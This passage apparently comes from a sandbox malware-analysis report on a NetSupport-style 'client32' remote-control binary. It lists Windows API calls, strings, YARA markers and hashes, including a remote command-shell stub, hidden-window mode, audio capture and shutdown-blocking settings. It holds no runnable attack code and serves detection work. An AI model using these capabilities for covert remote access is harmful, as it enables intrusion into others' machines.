                                                                                                                                                                                                    • ShowCursor.USER32(00000000), ref: 110F55DD
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,NSBlankExit), ref: 110F55EE
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5614
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5633
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F5644
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F564D
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5661
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110F5674
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F568C
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F56A7
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F56B0
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F56BF
                                                                                                                                                                                                    • ShowCursor.USER32(00000001), ref: 110F56CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$CursorDispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpenwsprintf
                                                                                                                                                                                                    • String ID: NSBlankExit
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111031DA
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$Leave$Enter$Initializewsprintf
                                                                                                                                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,?), ref: 11157805
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 11157817
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 11157821
                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(?,-00000001,00000001,?), ref: 11157858
                                                                                                                                                                                                    • DeleteMenu.USER32(?,-00000001,00000400,?,?), ref: 11157871
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 11157878
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1115790B
                                                                                                                                                                                                    • IsWindowVisible.USER32(7658FC40), ref: 11157921
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$Item$Count$DeleteInfoVisibleWindowwsprintf
                                                                                                                                                                                                    • String ID: &%d %s$0$0$C
                                                                                                                                                                                                    • API String ID: 842373234-1709426716
                                                                                                                                                                                                    • Opcode ID: 77f97b495f7733a266680904539a4bd5a8708f4ad21c4815dcaf4031efbd88c4
                                                                                                                                                                                                    • Instruction ID: 1e8589750d2a290717ebac9bef8f5a9acc43d2f8c320684ce06ac1595057c3e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77f97b495f7733a266680904539a4bd5a8708f4ad21c4815dcaf4031efbd88c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551D4719006299BDB91CF64CC85BEEF7B8EF45318F4080D9E919A7240EB71AA81CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75C22EF0,75C22EE0,75C32D70), ref: 11059504
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059516
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059520
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 1105952C
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059536
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059542
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1105954C
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059558
                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000000), ref: 11059560
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1105958D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11059639
                                                                                                                                                                                                      • Part of subcall function 1108BC20: GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCA2
                                                                                                                                                                                                      • Part of subcall function 1108BC20: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCD4
                                                                                                                                                                                                      • Part of subcall function 1108BC20: CloseHandle.KERNEL32(00000000), ref: 1108BD0C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$EventInformation$Create$Close$ResetTokenVersionwsprintf
                                                                                                                                                                                                    • String ID: CloseHandle_1$D$remcmdstub.exe %u %u %u %u %%COMSPEC%%
                                                                                                                                                                                                    • API String ID: 2554110944-1870880251
                                                                                                                                                                                                    • Opcode ID: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
                                                                                                                                                                                                    • Instruction ID: 9498dede17ae523b820893f7966d078463fb7189cb60d919b27b44eccd4d473b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8516675A41328ABEB51CF98CC85FEAB7B9EB48B04F004099F718E72C4E6B16940CF55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1103B15F
                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 1103B1A4
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000010,00000000,00000000), ref: 1103B1CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountMessagePostSleepTick
                                                                                                                                                                                                    • String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
                                                                                                                                                                                                    • API String ID: 507213284-4185502373
                                                                                                                                                                                                    • Opcode ID: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
                                                                                                                                                                                                    • Instruction ID: f79ec28786b2f4c10a59bc50768d7a54d57fb70274f002d705909bb0de105b61
                                                                                                                                                                                                    • Opcode Fuzzy Hash: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12412934F4065EBEE721CA529C85FBDB795ABC0B0DF5040A5FE247E2C0EB60B4408355
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(111E59C8), ref: 1111D2B9
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 1111D3DD
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000026), ref: 1111D3F2
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 1111D41B
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 1111D441
                                                                                                                                                                                                      • Part of subcall function 1110F690: GetStockObject.GDI32(0000000D), ref: 1110F6A9
                                                                                                                                                                                                      • Part of subcall function 1110F690: GetObjectA.GDI32(00000000,0000003C,?), ref: 1110F6B6
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SMALLE.FON), ref: 1110F6FC
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SYMBOLE.FON), ref: 1110F703
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SERIFE.FON), ref: 1110F70A
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SSERIFE.FON), ref: 1110F711
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(COURE.FON), ref: 1110F718
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(VGASYS.FON), ref: 1110F71F
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(VGAFIX.FON), ref: 1110F726
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SMALLF.FON), ref: 1110F72D
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SYMBOLF.FON), ref: 1110F734
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SERIFF.FON), ref: 1110F73B
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SSERIFF.FON), ref: 1110F742
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(COURF.FON), ref: 1110F749
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(8514SYS.FON), ref: 1110F750
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(8514FIX.FON), ref: 1110F757
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(DOSAPP.FON), ref: 1110F75E
                                                                                                                                                                                                    • SetStretchBltMode.GDI32(?,00000001), ref: 1111D46F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FontResource$CompatibleCreateObject$CapsDeviceIncrementInterlockedModeStockStretch
                                                                                                                                                                                                    • String ID: ..\ctl32\Remote.cpp$Cachesize$ScaleToFitMode$View$idata->bmc.bmcache$idata->dcache [i]$idata->gcache$idata->gcache == NULL
                                                                                                                                                                                                    • API String ID: 2679142411-442042151
                                                                                                                                                                                                    • Opcode ID: e3b5b5c9a40ee4a0cbc48b1e016f5efcc9a74aa2538585c9951ba4c7deda69df
                                                                                                                                                                                                    • Instruction ID: 132018d3be7588c9e0a9856a97cff627b8037e08f3dc5478dbc2c9ccb036d385
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3b5b5c9a40ee4a0cbc48b1e016f5efcc9a74aa2538585c9951ba4c7deda69df
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 094104B5B41B026BD760DB71DC89FCAF2E4AF55708F004439F56A9A284F7B0B5408B56
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110416EC
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1104171E
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11041769
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 110417AE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110417C5
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110417CE
                                                                                                                                                                                                      • Part of subcall function 11094E70: LoadLibraryA.KERNEL32(USER32,?,?,110077D5), ref: 11094E79
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 11094E8D
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 11094E9A
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11094EA7
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11094EB4
                                                                                                                                                                                                      • Part of subcall function 11094DC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 11094DDD
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 11015410: GlobalAddAtomA.KERNEL32(NSMIdentifyWnd), ref: 11015426
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProcwsprintf$CloseHandle$AtomCreateGlobalInfoLibraryLoadParametersProcessSystem
                                                                                                                                                                                                    • String ID: %s %s$%sPlaySound.exe$%sSounds\%s$D$RandomSelect$StudentPicked.wav$StudentSelected.wav
                                                                                                                                                                                                    • API String ID: 186240662-3892444432
                                                                                                                                                                                                    • Opcode ID: 626b57387dd91a73adf296395c911d9880e4fc6db4f814020c376c6a938eeb46
                                                                                                                                                                                                    • Instruction ID: 9c2d6cc32ef246ace46494575b6d7f0e632273de9197a299b6468622a4a2010b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 626b57387dd91a73adf296395c911d9880e4fc6db4f814020c376c6a938eeb46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A7187B5E4021E6BEB15DB50DC81FDEB7B8AB04718F1041D9E619A71C0EA70BB44CFA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,Audio,DisableSounds,00000000,00000000,BBC4A55B), ref: 1100B3BB
                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B3D8
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B42F
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B469
                                                                                                                                                                                                      • Part of subcall function 1100AC60: EnterCriticalSection.KERNEL32(?,BBC4A55B), ref: 1100ACA4
                                                                                                                                                                                                      • Part of subcall function 1100AC60: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACC2
                                                                                                                                                                                                      • Part of subcall function 1100AC60: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AD0E
                                                                                                                                                                                                      • Part of subcall function 1100AC60: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD55
                                                                                                                                                                                                      • Part of subcall function 1100AC60: CloseHandle.KERNEL32(00000000), ref: 1100AD5C
                                                                                                                                                                                                      • Part of subcall function 1100AC60: FreeLibrary.KERNEL32(?), ref: 1100AD8B
                                                                                                                                                                                                      • Part of subcall function 1100AC60: LeaveCriticalSection.KERNEL32(?), ref: 1100AD95
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B48E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B513
                                                                                                                                                                                                    • DisableSounds, xrefs: 1100B362
                                                                                                                                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B4F3
                                                                                                                                                                                                    • \\.\NSAudioFilter, xrefs: 1100B3D0
                                                                                                                                                                                                    • InitCaptureSounds NT6, xrefs: 1100B4AE
                                                                                                                                                                                                    • Audio, xrefs: 1100B367
                                                                                                                                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B53C
                                                                                                                                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc
                                                                                                                                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                                                                                    • API String ID: 2063774063-2362500394
                                                                                                                                                                                                    • Opcode ID: 8c0021620979079e8b2f1001507a6bebe200837a90809a63ef1329eec99b15e0
                                                                                                                                                                                                    • Instruction ID: 13704de1d539ef30c3066c3cc5484e22fa9722ec6e344ec07ec17af159e95cc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c0021620979079e8b2f1001507a6bebe200837a90809a63ef1329eec99b15e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A951D8B5E04A4AAFE714CF64DC80BAEF7E8FB04359F10467EE92993640E731765087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
                                                                                                                                                                                                    • LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000032), ref: 110271EE
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000031), ref: 110271F3
                                                                                                                                                                                                    • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
                                                                                                                                                                                                    • LoadIconA.USER32(11000000,00000491), ref: 1102721B
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000032), ref: 1102722A
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000031), ref: 1102722F
                                                                                                                                                                                                    • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Load$MetricsSystem$IconImage$Library
                                                                                                                                                                                                    • String ID: AdminUserAcknowledge$PCIRES$_License$product
                                                                                                                                                                                                    • API String ID: 3832029118-1270847556
                                                                                                                                                                                                    • Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                                                                                    • Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 689D09A6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 689D09C3
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 689D09CD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 689D09DB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 689D09E9
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 689D09F7
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 689D0A6C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                    • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                                                                                                                                    • API String ID: 2449869053-2279908372
                                                                                                                                                                                                    • Opcode ID: f5b1db86d8d30a3c5533aee2abc3e974ea33af8802a4696f27d615dd0fd726c0
                                                                                                                                                                                                    • Instruction ID: 3303e6760095e447865f75d84a0a1a802eda909793a189a6bbffb0e1b225b3b7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5b1db86d8d30a3c5533aee2abc3e974ea33af8802a4696f27d615dd0fd726c0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C771B01618AFEB189B748C59FEE77B8EF8A314F404195F909A7280DB749E41CF91
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • F, xrefs: 11065959
                                                                                                                                                                                                    • ..\ctl32\Connect.cpp, xrefs: 110657F2, 110658C5, 11065AB0
                                                                                                                                                                                                    • nclen=%d, bytesleft=%d, cmd=%d (%x), nbytes_c=%d, nbytes_uc=%d, p=%x, p0=%x, xrefs: 1106594A
                                                                                                                                                                                                    • offset=%04x, nbytes=%04x (%d), nc=x%x, xrefs: 110659A8
                                                                                                                                                                                                    • datalen + idata->recvbytes <= MAX_DEFLATE_SIZE (MAX_STREAMLEN), xrefs: 110657F7
                                                                                                                                                                                                    • %02x , xrefs: 11065A48
                                                                                                                                                                                                    • Decompress error: %s, xrefs: 1106596D
                                                                                                                                                                                                    • DoStream error, been_reset=1, xrefs: 1106578A
                                                                                                                                                                                                    • %04x: %s, xrefs: 11065A70
                                                                                                                                                                                                    • Decomp, nbytes_c=%d, xrefs: 110658B1
                                                                                                                                                                                                    • Compression Error. (s%d) NSMConnection::DoStream **** not selected ****, xrefs: 11065762
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %02x $%04x: %s$..\ctl32\Connect.cpp$Compression Error. (s%d) NSMConnection::DoStream **** not selected ****$Decomp, nbytes_c=%d$Decompress error: %s$DoStream error, been_reset=1$F$datalen + idata->recvbytes <= MAX_DEFLATE_SIZE (MAX_STREAMLEN)$nclen=%d, bytesleft=%d, cmd=%d (%x), nbytes_c=%d, nbytes_uc=%d, p=%x, p0=%x$offset=%04x, nbytes=%04x (%d), nc=x%x
                                                                                                                                                                                                    • API String ID: 0-4168416193
                                                                                                                                                                                                    • Opcode ID: 899b97f94cfa9678fdf6eb455168cb10ce1bc93072f683e8b541ce37095d998f
                                                                                                                                                                                                    • Instruction ID: 6bc3b423fe9e58ad3992282e61b86e9f2554b466721a9916031d5a1a83f6629d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 899b97f94cfa9678fdf6eb455168cb10ce1bc93072f683e8b541ce37095d998f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FA15D75E012299FDB24CF64CC81BEEB7B9BF49744F5040E9E949A7240E7316A80CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,11136285,00000000,?,?), ref: 1112D638
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,?,11136285,00000000,?,?), ref: 1112D667
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastShowWindow
                                                                                                                                                                                                    • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                                                                                                                    • API String ID: 3252650109-4091810678
                                                                                                                                                                                                    • Opcode ID: 90b88cc160fa5e910e9b8402eb8dd17e171ab97e4abd2f8fdd96a39cb16427aa
                                                                                                                                                                                                    • Instruction ID: fa0dcf7bfd4a991f80e84da17f5d1f9dbb64edff6fc809840f3415ca9232f2cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90b88cc160fa5e910e9b8402eb8dd17e171ab97e4abd2f8fdd96a39cb16427aa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A761E371B40315AFEB11CBD4CC85F6AF7A5E744B18F604129F625AB2C4EAB16840CB85
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoadwsprintf
                                                                                                                                                                                                    • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                                                                                                                    • API String ID: 2170448811-1736626566
                                                                                                                                                                                                    • Opcode ID: 4abc1ebb41a915a1e68705d27eae302cf7f0fb804471937ee6b8da54ad230a0c
                                                                                                                                                                                                    • Instruction ID: caad9b3ffb412b0ce201366128ee2238a993313849ab4ce7a7f1ca44c3893492
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4abc1ebb41a915a1e68705d27eae302cf7f0fb804471937ee6b8da54ad230a0c
